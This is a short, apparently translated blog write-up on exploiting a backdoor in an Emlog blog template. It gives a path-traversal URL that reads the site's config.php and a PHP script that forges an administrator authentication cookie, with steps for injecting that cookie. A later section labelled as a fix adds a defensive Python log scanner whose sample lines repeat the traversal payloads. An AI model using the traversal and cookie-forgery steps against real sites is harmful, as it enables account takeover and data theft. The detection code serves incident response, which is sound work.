
0x01 Preface


0x02 Search keywords


Emlog template 明月浩空 backdoor exploitation analysis - Ti0s's Blog

0x03 Known backdoor address

view-source: + domain + /content/templates/limh.me/function/image.php?url=../../../../config.php


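This is an arbitrary file content read backdoor. It can read important information such as the database details; here we use it to calculate the Emlog cookie and forge an administrator login.

0x04 Cookie calculation script

$time=time() + 60 * 60 * 24 * 30 * 12;
$key = hash_hmac('md5', 'admin|' . $time, '*****************************'); // this is the Key; admin is the administrator name to spoof
$hash=hash_hmac('md5', 'admin|' . $time, $key); // admin is the administrator name to spoof
$cookie='admin|' . $time."|".$hash; // admin is the administrator name to spoof
echo $cookie;
setcookie("*****************************",$cookie); // this is the cookie name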


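After calculating it, go to the admin backend (default address /admin) and use the Firefox add-on Cookie Edit to add a cookie whose name is AUTH_COOKIE_NAME and whose value is the calculated one.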


Then refresh the page; the cookie forgery succeeds.




0x05 Fix method


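For site owners who ran this template, the access log shows whether the image.php path from section 0x03 was requested with a url value that leaves the template directory. The following is an added example, not part of the original post: it assumes Combined Log Format, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path as given in the post; the log format and sample lines are assumptions.
BACKDOOR_PATH = "/content/templates/limh.me/function/image.php"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\d+|-)')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding, e.g. %252e%252e -> %2e%2e -> '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Describe a request to the template's image.php; None for other lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not fully_decode(parts.path).lower().endswith(BACKDOOR_PATH):
        return None
    raw = parse_qs(parts.query, keep_blank_values=True).get("url", [""])[0]
    url = fully_decode(raw).replace("\\", "/")
    segments = url.split("/")
    return {
        "ip": m["ip"],
        "url": url,
        "traversal": ".." in segments or url.startswith("/"),
        "config": segments[-1].lower() == "config.php",
        # A 200 response with a body means file content was probably returned.
        "served": m["status"] == "200" and m["size"] not in ("-", "0"),
    }

def scan(lines):
    """Return only the requests that try to leave the template directory."""
    hits = (classify(line) for line in lines)
    return [h for h in hits if h and h["traversal"]]

# Constructed sample access-log lines (documentation IP ranges).
REQ_FMT = '{} - - [10/Oct/2023:13:55:36 +0000] "GET {} HTTP/1.1" {} {}'
SAMPLE_LOG = [
    REQ_FMT.format("203.0.113.7", BACKDOOR_PATH + "?url=../../../../config.php", 200, 1432),
    REQ_FMT.format("203.0.113.7", BACKDOOR_PATH + "?url=%252e%252e%2f%252e%252e%2fconfig.php", 404, 0),
    REQ_FMT.format("198.51.100.4", BACKDOOR_PATH + "?url=images/banner.jpg", 200, 20480),
    REQ_FMT.format("198.51.100.4", "/index.php", 200, 5120),
]
```

A hit with both "config" and "served" set means the contents of config.php should be treated as disclosed, including the key and cookie name the script in section 0x04 depends on.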